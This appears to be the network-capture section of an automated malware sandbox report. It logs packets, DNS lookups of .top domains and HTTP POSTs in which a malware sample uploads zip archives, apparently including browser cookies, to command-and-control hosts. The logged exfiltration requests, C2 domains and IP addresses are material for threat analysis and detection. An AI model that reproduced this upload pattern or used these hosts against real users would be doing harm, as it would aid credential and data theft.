Apr 12, 2021 15:12:20.278845072 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.278856993 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.278862953 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.278866053 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.278898954 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.278919935 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.278939962 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.278955936 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.278959990 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.278963089 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.278984070 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279006004 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279012918 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279019117 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279026031 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279047966 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279068947 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279088974 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279104948 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279109955 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279109955 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279131889 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279155016 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279167891 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279176950 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279177904 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279200077 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279220104 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279241085 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279244900 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279251099 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279261112 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279280901 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279304028 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279316902 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279323101 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279326916 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279349089 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279369116 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279391050 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279411077 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279412031 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279416084 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279433966 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279454947 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279475927 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279491901 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279496908 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279499054 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279520988 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279541969 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279562950 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279573917 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279584885 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279584885 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279591084 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279606104 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279627085 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279625893 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279647112 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279670000 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279691935 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279700994 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279706001 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279712915 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279733896 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279737949 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279753923 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279772997 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279773951 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279794931 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279815912 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279839039 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279850006 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279856920 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279860973 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279881954 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279881954 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279903889 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279925108 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279944897 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279958010 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279967070 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.279968977 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279985905 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.279988050 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.280076981 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.280083895 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.280095100 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.280133009 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.280193090 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.280234098 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.291095972 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.332534075 CEST	80	49720	8.209.66.205	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 15:11:03.252877951 CEST	52704	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:03.302067995 CEST	53	52704	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:03.408680916 CEST	52212	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:03.466120958 CEST	53	52212	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:03.603041887 CEST	54302	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:03.655349970 CEST	53	54302	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:05.147036076 CEST	53784	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:05.208934069 CEST	53	53784	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:06.122662067 CEST	65307	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:06.171329975 CEST	53	65307	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:06.842330933 CEST	64344	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:06.902183056 CEST	53	64344	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:14.613799095 CEST	62060	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:14.663032055 CEST	53	62060	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:15.750401020 CEST	61805	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:15.803128958 CEST	53	61805	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:16.828474998 CEST	54795	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:16.877321959 CEST	53	54795	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:18.032571077 CEST	49557	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:18.089823961 CEST	53	49557	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:21.158091068 CEST	61733	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:21.218122005 CEST	53	61733	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:22.877881050 CEST	65447	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:22.929517984 CEST	53	65447	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:24.133338928 CEST	52441	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:24.184992075 CEST	53	52441	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:29.015472889 CEST	62176	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:29.067347050 CEST	53	62176	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:30.175316095 CEST	59596	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:30.225624084 CEST	53	59596	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:30.923969984 CEST	65296	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:30.985375881 CEST	53	65296	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:36.018687963 CEST	63183	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:36.076206923 CEST	53	63183	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:39.333095074 CEST	59736	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:39.339348078 CEST	51058	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:39.339772940 CEST	52636	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:39.382023096 CEST	53	59736	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:39.388422012 CEST	53	52636	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:39.390912056 CEST	53	51058	8.8.8.8	192.168.2.5
Apr 12, 2021 15:11:59.265461922 CEST	60151	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:11:59.331958055 CEST	53	60151	8.8.8.8	192.168.2.5
Apr 12, 2021 15:12:09.218292952 CEST	56969	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:12:09.269835949 CEST	53	56969	8.8.8.8	192.168.2.5
Apr 12, 2021 15:12:16.208142996 CEST	55161	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:12:16.439253092 CEST	53	55161	8.8.8.8	192.168.2.5
Apr 12, 2021 15:12:17.179099083 CEST	54757	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:12:17.326972961 CEST	53	54757	8.8.8.8	192.168.2.5
Apr 12, 2021 15:12:18.367537022 CEST	49992	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:12:19.373641968 CEST	49992	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:12:19.599884987 CEST	53	49992	8.8.8.8	192.168.2.5
Apr 12, 2021 15:12:19.991362095 CEST	53	49992	8.8.8.8	192.168.2.5
Apr 12, 2021 15:12:22.812798977 CEST	60075	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:12:22.872903109 CEST	53	60075	8.8.8.8	192.168.2.5
Apr 12, 2021 15:12:40.032221079 CEST	55016	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:12:40.089642048 CEST	53	55016	8.8.8.8	192.168.2.5
Apr 12, 2021 15:12:54.322495937 CEST	64345	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:12:54.372682095 CEST	53	64345	8.8.8.8	192.168.2.5
Apr 12, 2021 15:12:57.854927063 CEST	57128	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:12:57.922904015 CEST	53	57128	8.8.8.8	192.168.2.5
Apr 12, 2021 15:13:04.510792017 CEST	54791	53	192.168.2.5	8.8.8.8
Apr 12, 2021 15:13:04.585005999 CEST	53	54791	8.8.8.8	192.168.2.5

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Apr 12, 2021 15:12:19.991468906 CEST	192.168.2.5	8.8.8.8	d001	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 12, 2021 15:12:16.208142996 CEST	192.168.2.5	8.8.8.8	0xa7f3	Standard query (0)	aufsvg12.top	A (IP address)	IN (0x0001)
Apr 12, 2021 15:12:17.179099083 CEST	192.168.2.5	8.8.8.8	0xe1a7	Standard query (0)	mardeq01.top	A (IP address)	IN (0x0001)
Apr 12, 2021 15:12:18.367537022 CEST	192.168.2.5	8.8.8.8	0x983	Standard query (0)	awumad01.top	A (IP address)	IN (0x0001)
Apr 12, 2021 15:12:19.373641968 CEST	192.168.2.5	8.8.8.8	0x983	Standard query (0)	awumad01.top	A (IP address)	IN (0x0001)
Apr 12, 2021 15:12:40.032221079 CEST	192.168.2.5	8.8.8.8	0x9034	Standard query (0)	EiodCJGkPupHarewIHgoYXhjJQvRZ.EiodCJGkPupHarewIHgoYXhjJQvRZ	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 12, 2021 15:12:16.439253092 CEST	8.8.8.8	192.168.2.5	0xa7f3	No error (0)	aufsvg12.top		8.211.1.15	A (IP address)	IN (0x0001)
Apr 12, 2021 15:12:17.326972961 CEST	8.8.8.8	192.168.2.5	0xe1a7	No error (0)	mardeq01.top		8.209.64.179	A (IP address)	IN (0x0001)
Apr 12, 2021 15:12:19.599884987 CEST	8.8.8.8	192.168.2.5	0x983	No error (0)	awumad01.top		8.209.66.205	A (IP address)	IN (0x0001)
Apr 12, 2021 15:12:19.991362095 CEST	8.8.8.8	192.168.2.5	0x983	No error (0)	awumad01.top		8.209.66.205	A (IP address)	IN (0x0001)
Apr 12, 2021 15:12:40.089642048 CEST	8.8.8.8	192.168.2.5	0x9034	Name error (3)	EiodCJGkPupHarewIHgoYXhjJQvRZ.EiodCJGkPupHarewIHgoYXhjJQvRZ	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

aufsvg12.top

mardeq01.top

awumad01.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49717	8.211.1.15	80	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 15:12:16.555598021 CEST	1584	OUT	POST /index.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------jmACsrpgBVBRjTx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Host: aufsvg12.top Content-Length: 67238 Cache-Control: no-cache
Apr 12, 2021 15:12:16.555807114 CEST	1596	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6a 6d 41 43 73 72 70 67 42 56 42 52 6a 54 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 Data Ascii: -----------------------------jmACsrpgBVBRjTxContent-Disposition: form-data; name="file"; filename="C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\ckDbkngmRYjcl.zip"Content-Type: application/octet-streamPK\|R_A
Apr 12, 2021 15:12:16.597224951 CEST	1606	OUT	Data Raw: 0d b3 0f 0b c5 64 7e 09 cc 0c 6b 9c 33 b1 5c 7b 18 06 6f f1 2e 7e 98 a0 33 94 9c 31 0f 7a 87 1c 7d 8a 61 b5 2b ce 26 8a 12 a3 db 57 10 16 3a 0b 92 ec 9e b4 b2 1e 47 d4 53 15 da d2 58 be 53 f5 b2 bb 5c 67 39 92 ec 4f e4 cd 67 c0 34 c5 2e c8 48 2a Data Ascii: d~k3\{o.~31z}a+&W:GSXS\g9Og4.H*\:=&<)b5&x,REDz{36xu!ed>ot\| bd_Zc5{K-QikjC6\Q\]#Y5,ChboRLUR<`#\!:;E
Apr 12, 2021 15:12:16.597326040 CEST	1619	OUT	Data Raw: 73 77 f6 39 11 f2 f9 7b 0a a1 fa e3 ac c6 0d a3 07 bd e8 85 75 70 89 74 62 bf e2 d7 c8 b4 f5 c6 28 52 3a 34 2e ce 25 17 f9 c5 7d 61 e0 af 7b 42 52 b6 65 f0 c2 26 b6 06 26 5d ce 19 c9 10 75 34 04 cb bb 92 55 21 cc 2c 67 9e 36 c8 b8 ec bd 2e 8b 1e Data Ascii: sw9{uptb(R:4.%}a{BRe&&]u4U!,g6.QJh?ld{ZW-G^Tsnb{p.5B[X 9mw*\=\|Y<V{lcE8B?^}89DZqE:bu.d/Rm
Apr 12, 2021 15:12:16.597361088 CEST	1622	OUT	Data Raw: 21 40 ea b6 78 b4 b0 c2 af 50 d8 c3 ef eb c2 a7 07 dd e5 bd 91 79 6e 34 80 f2 84 56 2b 22 d9 15 be 85 10 75 1f 02 b0 80 39 69 6a 2f b4 29 3f c7 8e db b3 f2 44 1b 4d bc f4 31 29 7d b8 6f b1 b9 cb 69 e3 e9 6e 1c db 56 40 41 d5 62 e3 81 12 c3 77 aa Data Ascii: !@xPyn4V+"u9ij/)?DM1)}oinV@AbwSrI{?R,UT:,<[MEKyBVSkd*4"l^n_f:9r2$EZkPf04HI=
Apr 12, 2021 15:12:16.638623953 CEST	1625	OUT	Data Raw: b6 d9 8f 28 1f 4f b7 77 e0 de 7a 60 7d 16 a3 07 64 82 ee 6b ea 6a ac 6e b7 5b 83 48 ce 18 b6 e4 8e 12 af 0b aa ad 40 69 e6 8b c9 7c aa 51 39 c0 60 6b 9b 38 18 11 7c 4b 24 71 ad dc bd c5 04 a8 47 1b b8 fa 55 0e 3d ac 96 28 e5 a1 42 4e ef ad 20 db Data Ascii: (Owz`}dkjn[H@i\|Q9`k8\|K$qGU=(BN jztN+Iwa)"9#.oF?{l"DZw}KoI)t,OXd3[ob8Dj**#)(%{yRHDY=[P>M?<Q
Apr 12, 2021 15:12:16.638681889 CEST	1632	OUT	Data Raw: 59 26 56 1a 4f fd 04 69 3d 60 43 43 ee 45 75 2c d6 b3 2a a1 c2 15 de fb 07 13 10 81 38 b8 7b f5 cb 06 e7 ac 14 4e 06 7b 50 31 98 f7 a4 10 3a 71 71 62 71 04 f8 3f 86 df 77 22 ce 49 d5 2a 49 ef 14 54 f9 ee 87 3e 5f 32 7b 46 0b 2f ea 25 66 39 0c e8 Data Ascii: Y&VOi=`CCEu,8{N{P1:qqbq?w"IIT>_2{F/%f9Ai_&x_p(4<E}uy&TOk=1'&@$`w.2vS"7olKeBk!!vER&A.{UF}ai9v7{<
Apr 12, 2021 15:12:16.638701916 CEST	1635	OUT	Data Raw: 64 22 16 af fe 0d ee 6b 39 c5 3c 63 7f 3d 6f 71 8c 9e 89 33 40 bf da 8b 39 b2 88 7d e5 7f c9 db 6c 7d 1b 61 0f 11 df e9 75 46 70 58 0d 1d 5f 5b 37 8e 84 1b 0c 42 aa 8c 46 4b dd da e2 94 31 03 3b 0a 0d 2f 07 5f 21 a8 31 af 62 cc 3d 68 19 0f bb 52 Data Ascii: d"k9<c=oq3@9}l}auFpX_[7BFK1;/_!1b=hR3lUfcsM hG`s)BDF3J4B!?&h"3M.Z;dARhHM>`W4mI-uIh{nlr0cDg4$p 8\6
Apr 12, 2021 15:12:16.639998913 CEST	1638	OUT	Data Raw: 89 d2 a0 94 12 86 6c 0b 52 18 58 c0 27 5d 70 68 54 a7 70 7d aa 26 49 1d 3d d8 5f 2b 50 d2 dd c1 ad 2c 00 1f 7c e3 e8 ef 10 20 d6 b2 b5 61 6f af b6 0f 0d 1a 05 01 ec b0 4b db 8a ce 93 38 19 0f aa 76 e9 10 3c 1c e0 03 44 f5 45 7e a2 74 85 1f c3 28 Data Ascii: lRX']phTp}&I=_+P,\| aoK8v<DE~t(}nDK%5SK_"-~#[p\iVsiyv!3>5u\|a*O@Z)U-^GlS(F<8\|N}BKm\|
Apr 12, 2021 15:12:16.640311956 CEST	1652	OUT	Data Raw: 9c 6e 8c c6 bc e9 00 3f b8 e7 58 95 07 db 89 67 d4 43 0b 3d 74 8b a5 0d 93 db 5a 2c 13 a1 3a 43 b1 b5 df 07 d5 6b 9e f4 87 1d 27 31 5e f1 da cd 84 6a bb 5d fb ea 0b 78 72 7d b8 9a 46 3b 25 13 eb a0 7f 96 70 98 57 d8 8f 8f a4 6a b4 c0 eb ea e5 7e Data Ascii: n?XgC=tZ,:Ck'1^j]xr}F;%pWj~c&Fl\gma0cN7~SK9F%U}Lqm?X~"bTY9 .pTD/-p#uEQd5r*-<d
Apr 12, 2021 15:12:16.707063913 CEST	1653	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Mon, 12 Apr 2021 13:12:16 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close X-Powered-By: Express ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49718	8.209.64.179	80	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 15:12:17.378488064 CEST	1654	OUT	POST /index.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------pwDccphxPeFIadj User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Host: mardeq01.top Content-Length: 67223 Cache-Control: no-cache
Apr 12, 2021 15:12:17.378662109 CEST	1666	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 77 44 63 63 70 68 78 50 65 46 49 61 64 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 Data Ascii: -----------------------------pwDccphxPeFIadjContent-Disposition: form-data; name="file"; filename="C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\gLbcxbHAcf.zip"Content-Type: application/octet-streamPK\|Rcooki
Apr 12, 2021 15:12:17.420016050 CEST	1670	OUT	Data Raw: b5 09 75 81 40 36 00 da 1d a1 8e c7 15 6e 59 fd b8 c3 c1 0c 42 74 a4 b6 7d a9 75 9b 2f 1f 33 3d b6 19 d5 1a b8 81 1b 4e 7d 63 20 fc cd c0 b9 88 69 da 12 ab bb f4 ad 8e da 95 54 a3 63 81 f1 d1 fc 59 36 13 42 e7 ec b6 57 20 bb 0d c3 7a 7a a9 eb 9d Data Ascii: u@6nYBt}u/3=N}c iTcY6BW zzfR=-JcwT&DQ~@h6FX'-@'&)WV}/:@{U+mP/?iLC#sE{`uKwRi*Y33r
Apr 12, 2021 15:12:17.420049906 CEST	1673	OUT	Data Raw: 81 9a cb 3f 4a d7 b3 e4 4b 61 b6 1c 97 d6 2d 44 00 c8 a7 7f 94 e9 87 3d 87 29 aa 1b 90 fe 27 09 1b d1 2d 13 9f 17 4e 0f 7e 0c ed 05 ff 1b f0 c2 09 e6 54 a4 e3 31 4f e8 08 08 95 54 19 d5 3c 01 d3 01 be 1b b9 b7 0f cb 28 ce 4c fb 68 b0 01 ae ce 06 Data Ascii: ?JKa-D=)'-N~T1OT<(Lhf/(tdU=5t.I"KUz6)pc#N';77D#8j>NTDik_u:)DH</z<(gA8Z^f-2]}~}:Z
Apr 12, 2021 15:12:17.420057058 CEST	1675	OUT	Data Raw: 11 3d 00 f2 24 59 ca ab d7 6f ac f4 a1 7f c9 8e 85 e4 81 04 eb 8c 01 f5 ae f7 a4 67 e0 eb 1a 32 0e 07 18 94 ed 60 10 0c 2b 17 cb 21 8a 75 e3 2d 13 cb 53 a5 22 a5 a0 72 f9 41 f3 4a f4 80 94 a4 95 3f 86 5b d7 1b 1a 8f c0 cd ed e1 b7 83 17 30 b3 aa Data Ascii: =$Yog2`+!u-S"rAJ?[0Dy7FHYQ.)tNZa+Bo,P8DV z)KQ.5y('0~i}P\|d-cw~`IM]g"cc'`/_YBi^;")~
Apr 12, 2021 15:12:17.420068979 CEST	1678	OUT	Data Raw: 86 75 55 99 64 36 4c 0d 20 15 1e 3c 8a e0 d7 01 e5 b1 09 27 56 d3 77 7a d8 3c d0 e6 50 c9 50 f2 c9 87 be 9e d5 2e b9 b1 74 5c 96 9b fb a3 d6 14 c9 47 62 43 ed 1b ce 3b 00 5a 05 8b 1e 49 4c 1b 7b bc 31 14 0b 12 92 6b 16 e4 51 26 ab e1 d3 36 f5 a5 Data Ascii: uUd6L <'Vwz<PP.t\GbC;ZIL{1kQ&6y+jI8(VS!.pHs3+"_P?<V_S\|*(@~UQ+fKty}0zMLMnR(0^UZ2fO>r&
Apr 12, 2021 15:12:17.420104027 CEST	1681	OUT	Data Raw: e9 20 f0 33 2a c0 e9 91 70 c1 32 28 f4 07 9c c1 b1 09 3b 0b 1c 62 49 f8 dc 93 ad 9f fb 17 e7 2e 41 34 12 d6 07 08 66 13 e9 f9 04 3d 99 f0 da 0c 50 7b f8 82 8b 80 49 14 92 fa 69 02 56 42 6d 55 5b db 45 f8 b6 8b ef ad 77 62 d7 9d a0 43 c7 fc 15 84 Data Ascii: 3p2(;bI.A4f=P{IiVBmU[EwbCF6%j?wBaW~0^bWAkO?&c#QFhK6Wt;FV0iR&mN'\|iG^&@1`4qDytu"Uh,`9
Apr 12, 2021 15:12:17.420130968 CEST	1683	OUT	Data Raw: c6 d2 73 aa 51 c9 f4 de 01 b3 96 8b 38 b3 d0 ff da d1 e0 b9 91 f8 bf 45 df 89 60 97 26 97 08 12 ac 3f d0 94 7d 1c 76 21 c0 37 35 7d c7 02 fe 58 8c 61 e3 6a 73 53 2c d1 e1 ad b2 71 16 4d 56 3c 67 a0 a2 9b 6f 2d 62 89 bb 01 63 9c a7 60 91 2c 95 a8 Data Ascii: sQ8E`&?}v!75}XajsS,qMV<go-bc`,N)!l=[\Y*sU[:-zT"c6v/Dxlx?XCLOM"b 728Y/lys6vK9uREP@fQ`aWapACcT~
Apr 12, 2021 15:12:17.420152903 CEST	1686	OUT	Data Raw: 56 13 3f 14 e3 80 65 d2 cb fd 23 85 c6 6c 3a ba 4d f2 c1 ea 98 5c 11 bc 5d 54 c3 1d 91 e1 59 0d 11 9e a6 48 80 f4 f7 d5 69 10 e5 de fa 60 f7 27 b9 e3 62 04 1c 18 3a c0 79 5c de 1d 5f ed 24 77 85 13 f0 d8 6b 66 de c5 38 89 e2 e4 b4 45 d5 1d 69 16 Data Ascii: V?e#l:M\]TYHi`'b:y\_$wkf8EifLQ-JU~i.T-ayi+dql`S:7 0 w\S FT>pr9ilIO+"/R0-HSdNvAIKmudL?QM!p_E"
